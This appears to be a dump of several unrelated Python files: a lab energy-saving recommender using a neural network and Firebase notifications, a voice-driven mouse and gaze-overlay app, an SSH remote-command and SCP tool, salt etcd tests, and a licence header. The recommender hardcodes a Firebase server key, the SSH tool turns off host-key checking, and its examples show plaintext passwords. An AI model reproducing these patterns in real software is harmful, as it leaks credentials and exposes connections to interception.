assert(room == "outOfLab") #first room must be out of lab
self.footprints[room] = []
self.spaceDef[room] = i
self.realSDef[room] = self.realS[i]
i += 1
self.spaceDefInv = {v: k for k, v in self.spaceDef.items()}
for room in self.nonSpaces:
self.nonSpaceDef[room] = i
i += 1
self.nonSpaceDefInv = {v: k for k, v in self.nonSpaceDef.items()}
self.peopleDef = {}
i = 0
for person in self.peopleID:
self.timeout[person] = 0
self.peopleDef[person] = i
i += 1
self.peopleDefInv = {v: k for k, v in self.peopleDef.items()}
self.deviceDef = {}
i = 0
for device in self.personalDevices:
self.personal[device] = []
self.deviceDef[device] = i
i += 1
self.deviceDefInv = {v: k for k, v in self.deviceDef.items()}
self.deviceOwnership = {}
assert(len(self.personalDevices) == len(self.owners))
for i in range(len(self.personalDevices)):
device = self.personalDevices[i]
self.deviceOwnership[device] = self.owners[i]
# for device in self.personalDevices:
# self.deviceOwnership[device] = "Peter"
self.offsetVec1 = len(self.peopleDef)
self.offsetVec2 = self.offsetVec1 + len(self.spaceDef)
self.offsetVec3 = self.offsetVec2 + len(self.deviceDef)
self.vecLen = len(self.peopleDef) + len(self.spaceDef) + len(self.deviceDef)
self.offset1 = len(self.peopleDef) * len(self.spaceDef)
self.offset2 = self.offset1 + len(self.deviceDef)
self.offset3 = self.offset2 + len(self.spaceDef)
self.offset4 = self.offset3 + len(self.peopleDef)
self.recLen = self.offset4 # len of recommendation vector
def setup(self):
self.checkInterval = 60*15 # 15 minutes
self.users = None
self.userRecommendations = {}
self.locations = {}
self.rewards = {}
self.HVAC = {}
self.Lights = {}
self.Electric = {}
self.SpaceParameters = {}
self.spaces = {}
self.spaceNames = []
self.a = [] #room HVAC variance
self.b = [] #room light variance
self.z = [] #room max occupancy
self.x = 0 #current occupancy
self.getUsers()
self.setSpaceParameters()
#self.getUserLocations()
def setSpaceParameters(self, temp=72):
rooms = cloudserver.db.list_of_rooms
self.spaces = rooms
for room in rooms:
print("Loading room " + str(room) + "...")
self.SpaceParameters[room] = 0.2
def getUsers(self):
#create a list of users from the database
self.users = cloudserver.db.dumpUsers()
print "Loaded " + str(len(self.users)) + " users"
for user in self.users:
if "name" not in user or "userID" not in user:
continue
self.userRecommendations[user["userID"]] = []
self.rewards[user["userID"]] = user["balance"]
print "Loaded user recommendations dictionary"
def loadBuildingParams(self):
appliances = cloudserver.db.list_of_appliances
self.HVAC = {}
self.Lights = {}
self.Electric = {}
rooms = cloudserver.db.list_of_rooms
for room in rooms:
self.HVAC[room] = 0
self.Lights[room] = 0
self.Electric[room] = 0
print("Loading building parameters...")
for app in appliances:
appliance = appliances[app]
rooms = appliance["rooms"]
value = appliance["value"]
t = appliance["type"]
n = len(rooms)
for room in rooms:
if t == "Electrical":
if room not in self.Electric:
self.Electric[room] = value/n
else:
self.Electric[room] += value/n
elif t == "Light":
if room not in self.Lights:
self.Lights[room] = value/n
else:
self.Lights[room] += value/n
elif t == "HVAC":
if room not in self.HVAC:
self.HVAC[room] = value/n
else:
self.HVAC[room] += value/n
print("Finished loading building parameters.")
def getUserLocations(self):
self.locations = cloudserver.db.location_of_users
return
def returnRecs(self, user):
balance = 0
if user in self.rewards:
balance = self.rewards[user]
tempBalance = balance
json_return={
"location":"Location Name",
"location_id":"locationIDString",
"balance":balance,
"tempBalance": tempBalance,
"suggestions":[]
}
location = "outOfLab"
if user in self.locations:
location = self.locations[user]
json_return["location_id"]=location
json_return["location"]=cloudserver.db.RoomIdToName(location)
for person in self.userRecommendations:
print(str(len(self.userRecommendations[person])) + " " + person)
if user in self.userRecommendations:
for rec in self.userRecommendations[user]:
json_return["suggestions"].append(rec)
print(rec)
ret = cloudserver.db._encode(json_return,False)
return ret
def clearRecs(self, user, messageID):
print("CLEAR RECOMMENDATION")
if user in self.userRecommendations:
recs = self.userRecommendations[user]
if recs is None:
return
for i in range(len(recs)):
rec = recs[i]
print(messageID)
print(rec["messageID"])
if messageID == rec["messageID"]:
r = self.userRecommendations[user].pop(i)
print("Removed recommendation " + messageID + " from user " + user + " recommendation list. (clearRecs method)")
return
def decideNotification(self, deviceID):
if time.time() > self.timeout[deviceID] + 60*15:
self.timeout[deviceID] = time.time()
def clearRecommendations(self):
for user in self.userRecommendations:
self.userRecommendations[user] = []
def bestRecommendations(self, solutions):
#print("Getting best recommendations....")
#print(solutions)
for user in self.locations:
if user not in self.userRecommendations:
continue
#print(self.locations[user])
if (self.locations[user]) not in solutions:
r = random.choice(list(solutions))
message = "{0}|{1}|{2}".format("move", user, r)
suggestion = self.make_suggestion_item("move", "Move", "Move to " + self.realSDef[r], 3, message, 0)
self.checkRecommendation(user, suggestion)
return
def make_suggestion_item(self, iType, iTitle, iBodyText, iReward, messageID, inotification=0, Others={}):
Others = {
"type":iType,
"title":iTitle,
"body":iBodyText,
"reward":iReward,
"notification":inotification,
"messageID":messageID
}
return Others
def LPOptimization(self, spaces, a, b, z, x1):
energySum = []
solutions = {}
assert(len(a) == len(b))
for i in range(len(a)):
energySum.append(a[i] + b[i])
c = cvxopt.matrix(energySum, tc='d')
G = cvxopt.matrix(z, tc='d')
h = cvxopt.matrix([-1*x1], tc='d')
(status, x) = cvxopt.glpk.ilp(c,G.T,h,I=set(range(len(a))),B=set(range(len(a))))
print(status)
print(x)
for i in range(len(a)):
if x[i] > 0.5:
solutions[spaces[i]]= -1*z[i]
return solutions
def formatInputs(self):
self.spaceNames = []
self.a = [] #room HVAC variance
self.b = [] #room light variance
self.z = [] #room max occupancy
self.x = 0 #current occupancy
for s in self.spaces:
space = self.spaces[s]
if space["space"] == 1 and space["lab"] == 3:
self.spaceNames.append(s)
self.z.append(-1*space["maxOccupancy"])
HVAC = self.HVAC[s]*self.SpaceParameters[s]
self.a.append(HVAC)
Light = self.Lights[s]
self.b.append(Light)
self.x = len(self.locations)
def getSnapshot(self):
shot = cloudserver.db.snapshots_col_appliances.find().skip(cloudserver.db.snapshots_col_appliances.count()-1)
shot = list(shot)
shot = shot[0]
for room in self.spaces:
self.footprints[room] = 0 # shared energy (HVAC + Lights)
for p in self.personal:
self.personal[p] = 0 # personal energy (plugmeters)
for applianceName in shot["data"]:
appliance = shot["data"][applianceName]
rooms = appliance["rooms"]
t = appliance["type"]
if t == "Electrical":
if applianceName in self.personal:
self.personal[applianceName] = appliance["value"]
continue
numRooms = len(rooms)
for room in rooms:
if room not in self.footprints:
print "room " + room + " not in space database"
continue
if t == "HVAC":
self.footprints[room] += self.footprints[room] + appliance["value"]/numRooms#*self.multiplier/numRooms
elif t == "Light":
self.footprints[room] += self.footprints[room] + appliance["value"]/numRooms
print("finished getting appliance data")
def getState(self):
t1 = time.time() * 1000
self.getSnapshot()
t2 = time.time() * 1000
t_snapshot = t2 - t1
state = [0] * self.vecLen
t3 = time.time()*1000
shot = cloudserver.db.snapshots_col_users.find().skip(cloudserver.db.snapshots_col_users.count()-1)
t4 = time.time()*1000
t_DB = t4 - t3
print("\n\n\n---Snapshot: {0}ms".format(t_snapshot))
print("---DB Query: {0}ms\n\n\n".format(t_DB))
shot = list(shot)
shot = shot[0]
locations = [0] * len(self.spaceDef) #array of number of people in each space
t5 = time.time()*1000
for ID in shot["data"]:
if ID not in self.peopleDef:
continue
IDnum = self.peopleDef[ID] #person number
loc = shot["data"][ID]["location"]
locnum = 0
if loc in self.spaceDef:
locnum = self.spaceDef[loc] #location number
#elif loc in self.nonSpaceDef:
# locnum = self.nonSpaceDef[loc]
locations[locnum] += 1
state[IDnum] = locnum #assign space to input vector
else:
continue
t6 = time.time() * 1000
for room in self.footprints:
if room not in self.spaceDef:
continue
energy = self.footprints[room]
roomIndex = self.spaceDef[room]
offset = len(self.peopleDef)
state[roomIndex + offset] = energy
t7 = time.time() * 1000
for device in self.personal:
if device not in self.deviceDef:
continue
energy = self.personal[device]
deviceIndex = self.deviceDef[device]
offset = len(self.peopleDef) + len(self.spaceDef)
state[deviceIndex + offset] = energy
t8 = time.time() * 1000
t_ID = t6 - t5
t_room = t7 - t6
t_device = t8 - t7
print("\n\n\n---List:{0}ms".format(t5-t4))
print("---ID Loop:{0}ms".format(t_ID))
print("---Room Loop:{0}ms".format(t_room))
print("---Device Loop:{0}ms\n\n\n".format(t_device))
state += locations
state.append(72) #just to keep the time
print("Finished getting state")
return state
def randomRecommendations(self):
# for user in self.locations:
for user in self.userRecommendations:
# if user not in self.userRecommendations:
# continue
#print(self.locations[user])
r = random.choice(list(self.spaceDef.keys()))
message = "{0}|{1}|{2}".format("move", user, r)
body = "Move to " + self.realSDef[r] + "."
rec = self.make_suggestion_item("move", "Move", body, 3, message, 0)
self.checkRecommendation(user, rec)
# self.userRecommendations[user].append(rec)
for user in self.userRecommendations:
message = "{0}|{1}|{2}".format("shift", user, "XXXX")
body = "Come to lab now to save energy."
rec = self.make_suggestion_item("shift", "Shift", body, 3, message, 0)
self.checkRecommendation(user, rec)
# self.userRecommendations[user].append(rec)
for user in self.userRecommendations:
message = "{0}|{1}|{2}".format("shade", user, "XXXX")
body = "Lower shade on your window to save energy."
rec = self.make_suggestion_item("shade", "Shade", body, 1, message, 0)
self.checkRecommendation(user, rec)
# self.userRecommendations[user].append(rec)
return
def deepLearning(self):
t1 = time.time()*1000
state = self.getState()
t2 = time.time()*1000
t_state = t2 - t1
sess1 = tensf.Session()
saver = tensf.train.import_meta_graph('./model_6_1/model_6_1.meta', clear_devices=True)
saver.restore(sess1, tensf.train.latest_checkpoint('./model_6_1'))
graph = tensf.get_default_graph()
x1 = graph.get_tensor_by_name('s:0')
y1 = graph.get_tensor_by_name('eval_net/l3/output:0')
npState = np.array([state])
with tensf.Session() as sess:
sess.run(tensf.global_variables_initializer())
y_out = sess.run(y1, feed_dict = {x1:npState})
print("y_out length")
print(str(y_out.shape))
y_new = y_out.flatten()
t3 = time.time()*1000
t_NN = t3 - t2
icslSpace = [5, 7, 8, 9, 13, 14, 15, 16]
bSpace = [1, 11, 12]
tSpace = [6, 10, 14]
for user in self.peopleDef:
personNum = self.peopleDef[user] #person number
# print(personNum)
################
## Contextual Post filtering
###############
###############
## Intepret the group number to do filtering
groupNum = 0
if personNum <= 3:
# print("ICSL")
groupNum = 1
elif personNum > 3 and personNum <= 6:
# print("Burke")
groupNum = 2
else:
# print("Teherani")
groupNum = 3
###############
## 10 percent exploring (delivering which ever has the largest reward)
## 90 percent exploiting (do filtering to give more reasonable recommendation)
token = random.random()
personalNum = np.argmax(y_new[self.offset1:self.offset2])
if token < 0.9:
# print("Exploiting")
#personActionNum = np.argmax(y_new[personNum*len(self.spaceDef):(personNum+1)*len(self.spaceDef)])
if groupNum == 1: ## icsl lab
if personNum == 0: ## Fred, presumably only will work in his office
# print("Fred")
personActionNum = 2
## Add checking whether Fred's device has a positive reward
else: ## Kevin and Stephen, can work at any place available, other than professor's office
# print("Kevin and Stephen")
lc = [y_new[x + personNum*len(self.spaceDef)] for x in icslSpace]
personActionNum = personNum*len(self.spaceDef) + icslSpace[np.argmax(lc)]#y_new[personNum*len(self.spaceDef)+icslSpace])
elif groupNum == 2: ## Burke lab, can work at any place available, other than professor's office
# print("Burke Lab")
lc = [y_new[x + personNum*len(self.spaceDef)] for x in bSpace]
personActionNum = personNum*len(self.spaceDef) + bSpace[np.argmax(lc)]#y_new[personNum*len(self.spaceDef)+bSpace])
else: #Teherani lab
lc = [y_new[x + personNum*len(self.spaceDef)] for x in tSpace]
personActionNum = personNum*len(self.spaceDef) + tSpace[np.argmax(lc)]#y_new[personNum*len(self.spaceDef)+tSpace])
else:
print("Exploring")
personActionNum = np.argmax(y_new[personNum*len(self.spaceDef):(personNum+1)*len(self.spaceDef)])
personActionNum += personNum*len(self.spaceDef)
# print(personActionNum)
rec1 = self.interpretAction(personActionNum, y_new[personActionNum])
# rec2 = self.interpretAction(personalNum, y_new[personalNum])
if rec1 is not None:
print("Got recommendation")
self.checkRecommendation(user, rec1)
else:
print("Recommendation is not found")
# if rec2 is not None:
# print("Got recommendation")
# self.checkRecommendation(user, rec2)
# else:
# print("Recommendation is not found")
deviceMinimum = 1
num = 0
for d in self.deviceDef:
num = self.deviceDef[d]
break
for person in self.peopleDef:
rec1 = None
deviceNum = num + self.offset1
rec1 = self.interpretAction(deviceNum, 20)
self.checkRecommendation(person, rec1)
for owner in self.userRecommendations:
rec1 = None
maxReward = deviceMinimum
for device in self.deviceDef:
deviceNum = self.deviceDef[device] + self.offset1
realOwner = self.deviceOwnership[device]
if realOwner is None or owner != realOwner:
continue
if y_new[deviceNum] > deviceMinimum and y_new[deviceNum] > maxReward:
rec1 = self.interpretAction(deviceNum, y_new[deviceNum])
maxReward = y_new[deviceNum]
self.checkRecommendation(owner, rec1)
shiftMinimum = 1
for person in self.peopleDef:
rec1 = None
personNum = self.peopleDef[person] + self.offset3
if y_new[personNum] > shiftMinimum:
rec1 = self.interpretAction(personNum, y_new[personNum])
if rec1 is not None:
print("Got shift recommendation")
self.checkRecommendation(person, rec1)
#for user in self.userRecommendations:
# message = "{0}|{1}|{2}".format("shade", user, "XXXX")
# body = "Lower shade on your window to save energy."
# rec = self.make_suggestion_item("shade", "Shade", body, 1, message, 0)
# self.checkRecommendation(user, rec)
t4 = time.time()*1000
t_rec = t4 - t3
print("\n\n\nFinished time analysis:")
print("---Get States Time: {0}ms".format(t_state))
print("---DNN Computation: {0}ms".format(t_NN))
print("---Recommendations: {0}ms\n\n\n".format(t_rec))
def interpretAction(self, actionNum, reward):
sign = 1
if (reward < 0):
sign = -1
reward = math.log10(reward*sign)
#reward = reward * sign
reward = int(reward)
body = ""
rec = None
if actionNum < self.offset1:
person = actionNum / len(self.spaceDef)
print(person)
space = actionNum % len(self.spaceDef)
personName = self.peopleDefInv[person]
spaceName = self.spaceDefInv[space]
message = "{0}|{1}|{2}".format("move", personName, spaceName)
body = "Move to " + self.realSDef[spaceName] + "."
rec = self.make_suggestion_item("move", "Move", body, reward, message, 0)
if actionNum >= self.offset1 and actionNum < self.offset2:
device = actionNum - self.offset1
deviceName = self.deviceDefInv[device]
deviceOwner = self.deviceOwnership[deviceName]
message = "{0}|{1}|{2}".format("reduce", deviceOwner, deviceName)
body = "Reduce Power of " + deviceName
rec = self.make_suggestion_item("reduce", "Reduce", body, reward, message, 0)
if actionNum >= self.offset2 and actionNum < self.offset3:
space = actionNum - self.offset2
spaceName = self.spaceDefInv[space]
message = "{0}|{1}|{2}".format("force", "BuildingManager", spaceName)
body = "Force People from " + self.realSDef[spaceName]
rec = self.make_suggestion_item("force", "Force", body, reward, message, 0)
if actionNum >= self.offset3:
person = actionNum - self.offset3
personName = self.peopleDefInv[person]
message = "{0}|{1}|{2}".format("shift", personName, "XXXX")
body = "Come to lab now to save energy."
rec = self.make_suggestion_item("shift", "Shift", body, reward, message, 0)
return rec
def debugRecommendations(self):
print("\n\nDEBUG RECOMMENDATIONS---" + str(len(self.userRecommendations)) + " Users\n")
for user in self.userRecommendations:
print("User " + user)
print("---------")
recList = self.userRecommendations[user]
for rec in recList:
print(rec["type"])
print(rec["title"])
print(rec["body"])
print(" ")
def makeDataJSON(self, body):
newData = {"Text":body}
newDataJSON = json.loads(newData)
return newDataJSON
def checkRecommendation(self, user, rec):
if user not in self.userRecommendations:
return
nowTime = cloudserver.db._now()
moveTime = 20*60
reduceTime = 10*60
forceTime = 30*60
shiftTime = 12*60*60
shadeTime = 60*60
if rec is None or "messageID" not in rec:
return
print(rec["messageID"])
message = rec["messageID"]
t = rec["type"]
if (t == "move" and cloudserver.db.pushManagementDispCheck(message, nowTime-moveTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "reduce" and cloudserver.db.pushManagementDispCheck(message, nowTime-reduceTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "force" and cloudserver.db.pushManagementDispCheck(message, nowTime-forceTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "shift" and cloudserver.db.pushManagementDispCheck(message, nowTime-shiftTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
elif (t == "shade" and cloudserver.db.pushManagementDispCheck(message, nowTime-shadeTime)):
self.userRecommendations[user].append(rec)
cloudserver.db.submitRecommendationTimestamp(user, message)
#POST the notification through Firebase
body = rec["body"]
#if (t == "move"):
#body = "Please move to Lab Space A"
#dataJSON = self.makeDataJSON(body)
payload = json.dumps({"to":"/topics/useApp", "data":{"Text":body}})
send_url = 'https://fcm.googleapis.com/fcm/send'
headers = {"content-type":"application/json", "Authorization": "key=AAAAiCJmlCI:APA91bGzlrEKerd_O3SFnhgZJPJGg7OeoKbQ-hqONN2aFml5_A9FHstb957zwa7S2pXQ6tlxs2YZVBbpPPSsaYVhWIGdVYZpyVVa6KzsntVWXAFeK2fpoz--raiRg8Hd0E-zfNEZ30Gx"}
if (user == "36cd923d8be79f40" and t != "shade"):
r = requests.post(send_url, data=payload, headers=headers)
print("\nPost return is: " + r.text + "\n")
return
def runOptimization(self):
self.setSpaceParameters()
self.formatInputs()
solutions = self.LPOptimization(self.spaceNames, self.a, self.b, self.z, self.x)
self.bestRecommendations(solutions)
def startDaemon(self):
t=Thread(target=self._loopCheckDatabase,args=())
t.setDaemon(True)
t.start()
def _loopCheckDatabase(self):
self.getUserLocations()
self.loadBuildingParams()
while True:
self.clearRecommendations()
#self.runOptimization()
#self.randomRecommendations()
self.deepLearning()
self.debugRecommendations()
# will print the recommendations to terminal, comment to disable
time.sleep(self.checkInterval)
print "Interval"
|
__main__.py
|
import logging.handlers
import os
import sys
from pathlib import Path
### Libraries for threading functions
import threading
from queue import Queue
### Libraries for the mouse and speech recognition
import mouse
import sounddevice as sd
import vosk
import argparse
import json
if getattr(sys, "frozen", False) and hasattr(sys, "_MEIPASS"):
meipass = Path(sys._MEIPASS)
lib_path = next(meipass.glob("*glfw*"), None)
os.environ["PYGLFW_LIBRARY"] = str(lib_path)
from .models import Host_Controller
from .overlay import GazeOverlay
from .texture import PITextureController
from .ui import HostViewController
from .window import Window
### Function that runs in parallel with the video processing
def audio_recognition (args, q_vosk, model, dump_fn):
with sd.RawInputStream(samplerate=args.samplerate, blocksize = 8000, device=args.device, dtype='int16',
channels=1, callback=callback):
rec = vosk.KaldiRecognizer(model, args.samplerate)
while True:
data = q_vosk.get()
if rec.AcceptWaveform(data):
dictResult = json.loads(rec.Result())
# Keywords for the mouse actions
if "sélection" in dictResult.get("text"):
print("[LEFT CLICK]")
mouse.click("left")
if "option" in dictResult.get("text"):
print("[RIGHT CLICK]")
mouse.click("right")
if "montée" in dictResult.get("text"):
print("[UP]")
mouse.wheel(1)
if "descente" in dictResult.get("text"):
print("[DOWN]")
mouse.wheel(-1)
else:
pass
# print(rec.PartialResult())
if dump_fn is not None:
dump_fn.write(data)
if __name__ == "__main__":
q_vosk = Queue()
def int_or_str(text):
"""Helper function for argument parsing."""
try:
return int(text)
except ValueError:
return text
def callback(indata, frames, time, status):
"""This is called (from a separate thread) for each audio block."""
if status:
print(status, file=sys.stderr)
q_vosk.put(bytes(indata))
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
'-l', '--list-devices', action='store_true',
help='show list of audio devices and exit')
args, remaining = parser.parse_known_args()
if args.list_devices:
print(sd.query_devices())
parser.exit(0)
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter,
parents=[parser])
parser.add_argument(
'-f', '--filename', type=str, metavar='FILENAME',
help='audio file to store recording to')
parser.add_argument(
'-m', '--model', type=str, metavar='MODEL_PATH',
help='Path to the model')
parser.add_argument(
'-d', '--device', type=int_or_str,
help='input device (numeric ID or substring)')
parser.add_argument(
'-r', '--samplerate', type=int, help='sampling rate')
args = parser.parse_args(remaining)
if args.model is None:
args.model = "model"
if not os.path.exists(args.model):
print ("Please download a model for your language from https://alphacephei.com/vosk/models")
print ("and unpack as 'model' in the current folder.")
parser.exit(0)
if args.samplerate is None:
device_info = sd.query_devices(args.device, 'input')
# soundfile expects an int, sounddevice provides a float:
args.samplerate = int(device_info['default_samplerate'])
model = vosk.Model(args.model)
print('MODELLLLLLLLLLLLLLLLL :'+ str(model))
if args.filename:
dump_fn = open(args.filename, "wb")
else:
dump_fn = None
### Threading ###
thr = threading.Thread(target = audio_recognition, args = (args, q_vosk, model, dump_fn,) )
thr.start()
log_path = Path.home() / "pi_monitor_settings" / "pi_monitor.log"
log_path.parent.mkdir(exist_ok=True)
handlers = [
logging.StreamHandler(),
logging.handlers.RotatingFileHandler(log_path, mode="w", backupCount=30),
]
logging.basicConfig(
level=logging.DEBUG,
handlers=handlers,
style="{",
format="{asctime} [{levelname}] {message}",
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
try:
host_controller = Host_Controller()
# frame observer
texture_controller = PITextureController()
host_controller.add_observer("on_host_linked", texture_controller.reset)
host_controller.add_observer("on_recent_frame", texture_controller.update)
gaze_overlay = GazeOverlay()
host_controller.add_observer("on_recent_gaze", gaze_overlay.update)
win = Window(
texture_controller,
frame_rate=60.0,
callables=[
host_controller.poll_events,
host_controller.fetch_recent_data,
gaze_overlay.draw
],
)
win.open()
host_view_controller = HostViewController(
gui_parent=win.quickbar, controller=host_controller
)
win.run_event_loop()
except KeyboardInterrupt:
pass
except Exception:
logger.exception("Exception occured!")
for handler in logging.getLogger().handlers:
if isinstance(handler, logging.handlers.RotatingFileHandler):
handler.doRollover()
finally:
win.close()
host_controller.cleanup()
host_view_controller.cleanup()
logging.shutdown()
|
remote_scp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-12-13 16:35:33
# @Author : Zhongyi Qiao
# @Link : ${link}
# @Version : $Id$
import sys,os,getopt
import paramiko
import threading
import configparser
from scp import SCPClient
def getConnection(ip,username,password,command,port=22,local_filename="",remotepath="",remote_filename="",localpath=""):
"""
:param ip: 服务器的ip
:param username: 服务器的用户名称
:param password: 服务器的密码
:param CMD: 服务器的命令
:param port: 服务器的端口
"""
ssh = paramiko.SSHClient()
policy = paramiko.AutoAddPolicy()
ssh.set_missing_host_key_policy(policy)
ssh.connect(
hostname = ip, # 服务器的ip
port = port, # 服务器的端口
username = username, # 服务器的用户名
password = password # 用户名对应的密码
)
#传输文件
if command:
stdin, stdout, stderr = ssh.exec_command(command)
result = stdout.read().decode()
error = stderr.read().decode()
print("+++++++++++++++++++++++start++++++++++++++++++++")
print("[connect success] | ip : %s" % ip)
print("result: \n %s"%result)
if error != " ":
print("error: \n %s"%error)
print("+++++++++++++++++++++++done++++++++++++++++++++")
if all([local_filename,remotepath]):
scpclient=SCPClient(ssh.get_transport(), socket_timeout=15.0)
scpclient.put(local_filename, remotepath)
if all([remote_filename,localpath]):
scpclient=SCPClient(ssh.get_transport(), socket_timeout=15.0)
scpclient.get(remote_filename,localpath)
ssh.close()
#读取配置文件
def read_conf(config):
cf = configparser.ConfigParser()
filename = cf.read(config)
opt = cf.options("hosts")
host_list = []
for ooo in opt:
tmp_host = cf.get("hosts",ooo)
host_list.append(tmp_host.split(","))
return host_list
#采用多线程
def multi_thread(thread_target,args_lists):
thread_list = []
for args_tuple in args_lists:
#args_tuple=[(ip.strip(),username.strip(),password.strip(),command,"local_filename=","remote_filename=","remote_filename=","localpath=")]
thread = threading.Thread(target = thread_target, args = args_tuple)
thread_list.append(thread)
for tmp_argv in thread_list:
tmp_argv.start()
for tmp_argv in thread_list:
tmp_argv.join()
def main():
#初始化参数
ip=""
username=""
password=""
config=""
conf=""
command=""
local_filename=""
remotepath=""
remote_filename=""
localpath=""
#获取外参
opts,args = getopt.getopt(sys.argv[1:], "hH:U:P:f:c:p:u:g:d:", ["help","host=","username","password","conf","command","local_filename","remotepath","remote_filename","localpath"])
for o,a in opts:
if o in ("-h", "--help") or not o:
print ('Usage:python3 remote_cmd.py [options]... ')
print ("""Script supports remote command execution, file upload and file download
The script supports remote command execution, file upload and file download;
the host can be a target or multiple hosts;
the single host uses the - H IP - U username - P password parameter;
the multiple hosts use the format of the configuration file host.ini;
the content of the host.ini file takes [host] as the first line,
the second line uses the format of id = IP, username, passwd.
Examples are as follows:
-H :host ip -H 192.168.11.11
-U :-U uername
-P :-P passwd
-f :config file host.ini配置如下
[hosts]
###hostname=ip,username,password
1 = 192.168.152.131,root,123456
2 = 192.168.152.132,autotest,123456
3 = 192.168.152.133,root,123456
4 = 192.168.152.134,root,123456
-c :command -c 'ls ~/'
-p :local filename -u :remote path
-g :remote filename -d :local path
Usage :python3 remote_cmd.py -f /home/host.ini -c 'pwd' #remote hosts execute command , the list of host in the host.ini
python3 remote_cmd.py -f /home/conf/host.ini -p test.py -u /home/autotest ##Upload files to remote host
python3 remote_cmd.py -H '192.168.152.131' -U 'autotest' -P 'qia' -g ~/Videos.tar -d /home/autotest/test/ ###get remote file download /home/autotest/tests
python3 remote_cmd.py -H '192.168.152.131' -U 'autotest' -P 'qia' -c 'pwd' ##remotehost execute command
""")
sys.exit()
if o in ("-H","--host"):
ip=a
# print(ip)
if o in ("-U","--username"):
username=a
# print(username)
if o in ("-P","--password"):
password=a
# print(password)
if o in ("-f","--conf"):
config=a
#print(config)
if o in ("-c","--command"):
command=a
#print(command)
if o in ("-p","--local_filename"):
local_filename=a
# print(local_filename)
if o in ("-u","--remotepath"):
remotepath=a
# print(remotepath)
if o in ("-g","--remote_filename"):
remote_filename=a
#print(remote_filename)
if o in ("-d","--localpath"):
localpath=a
# print(localpath)
#判断是读参数还是读配置文件
host_list=[]
if all([ip,username,password]) and not config:
host_list=[(ip,username,password)]
elif config:
host_list=read_conf(config)
args_lists=[]
if not host_list:
print("Usage:python3 remote_cmd.py -h")
for ip,username,password in host_list:
args_lists.append([ip.strip(),username.strip(),password.strip(),command,22,local_filename,remotepath,remote_filename,localpath])
multi_thread(getConnection,args_lists)
if __name__ == "__main__":
main()
|
test_etcd_mod.py
|
import logging
import threading
import time
import pytest
import salt.modules.etcd_mod as etcd_mod
from salt.utils.etcd_util import get_conn
from tests.support.pytest.etcd import * # pylint: disable=wildcard-import,unused-wildcard-import
docker = pytest.importorskip("docker")
log = logging.getLogger(__name__)
pytestmark = [
pytest.mark.windows_whitelisted,
pytest.mark.skip_if_binaries_missing("docker", "dockerd", check_all=False),
]
@pytest.fixture
def configure_loader_modules(minion_opts):
return {
etcd_mod: {
"__opts__": minion_opts,
"__utils__": {
"etcd_util.get_conn": get_conn,
},
},
}
@pytest.fixture(scope="module")
def minion_config_overrides(etcd_profile):
return etcd_profile
@pytest.fixture(scope="module")
def etcd_client(minion_opts, profile_name):
return get_conn(minion_opts, profile=profile_name)
@pytest.fixture(scope="module")
def prefix():
return "/salt/util/test"
@pytest.fixture(autouse=True)
def cleanup_prefixed_entries(etcd_client, prefix):
"""
Cleanup after each test to ensure a consistent starting state.
"""
try:
assert etcd_client.get(prefix, recurse=True) is None
yield
finally:
etcd_client.delete(prefix, recurse=True)
def test_basic_operations(subtests, profile_name, prefix):
"""
Make sure we can do the basics
"""
with subtests.test("There should be no entries at the start with our prefix."):
assert etcd_mod.get_(prefix, recurse=True, profile=profile_name) is None
with subtests.test("We should be able to set and retrieve simple values"):
etcd_mod.set_("{}/1".format(prefix), "one", profile=profile_name)
assert (
etcd_mod.get_("{}/1".format(prefix), recurse=False, profile=profile_name)
== "one"
)
with subtests.test("We should be able to update and retrieve those values"):
updated = {
"1": "not one",
"2": {
"3": "two-three",
"4": "two-four",
},
}
etcd_mod.update(updated, path=prefix, profile=profile_name)
assert etcd_mod.get_(prefix, recurse=True, profile=profile_name) == updated
with subtests.test("We should be list all top level values at a directory"):
expected = {
prefix: {
"{}/1".format(prefix): "not one",
"{}/2/".format(prefix): {},
},
}
assert etcd_mod.ls_(path=prefix, profile=profile_name) == expected
with subtests.test("We should be able to remove values and get a tree hierarchy"):
updated = {
"2": {
"3": "two-three",
"4": "two-four",
},
}
etcd_mod.rm_("{}/1".format(prefix), profile=profile_name)
assert etcd_mod.tree(path=prefix, profile=profile_name) == updated
with subtests.test("updates should be able to be caught by waiting in read"):
return_list = []
def wait_func(return_list):
return_list.append(
etcd_mod.watch("{}/1".format(prefix), timeout=30, profile=profile_name)
)
wait_thread = threading.Thread(target=wait_func, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_mod.set_("{}/1".format(prefix), "one", profile=profile_name)
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/1".format(prefix)
assert modified["value"] == "one"
def test_with_missing_profile(subtests, prefix, etcd_version, etcd_port):
"""
Test the correct response when the profile is missing and we can't connect
"""
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode) and etcd_port != 2379:
# Only need to run this once
with subtests.test("Test no profile and bad connection in get_"):
assert etcd_mod.get_("{}/1".format(prefix)) is None
with subtests.test("Test no profile and bad connection in set_"):
assert etcd_mod.set_("{}/1".format(prefix), "lol") is None
with subtests.test("Test no profile and bad connection in update"):
assert etcd_mod.update({"{}/1".format(prefix): "SIUUU"}) is None
with subtests.test("Test no profile and bad connection in watch"):
assert etcd_mod.watch("{}/1".format(prefix)) is None
with subtests.test("Test no profile and bad connection in ls_"):
assert etcd_mod.ls_() is None
with subtests.test("Test no profile and bad connection in rm"):
assert etcd_mod.rm_("{}/1".format(prefix)) is None
with subtests.test("Test no profile and bad connection in tree"):
assert etcd_mod.tree() is None
|
video_stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
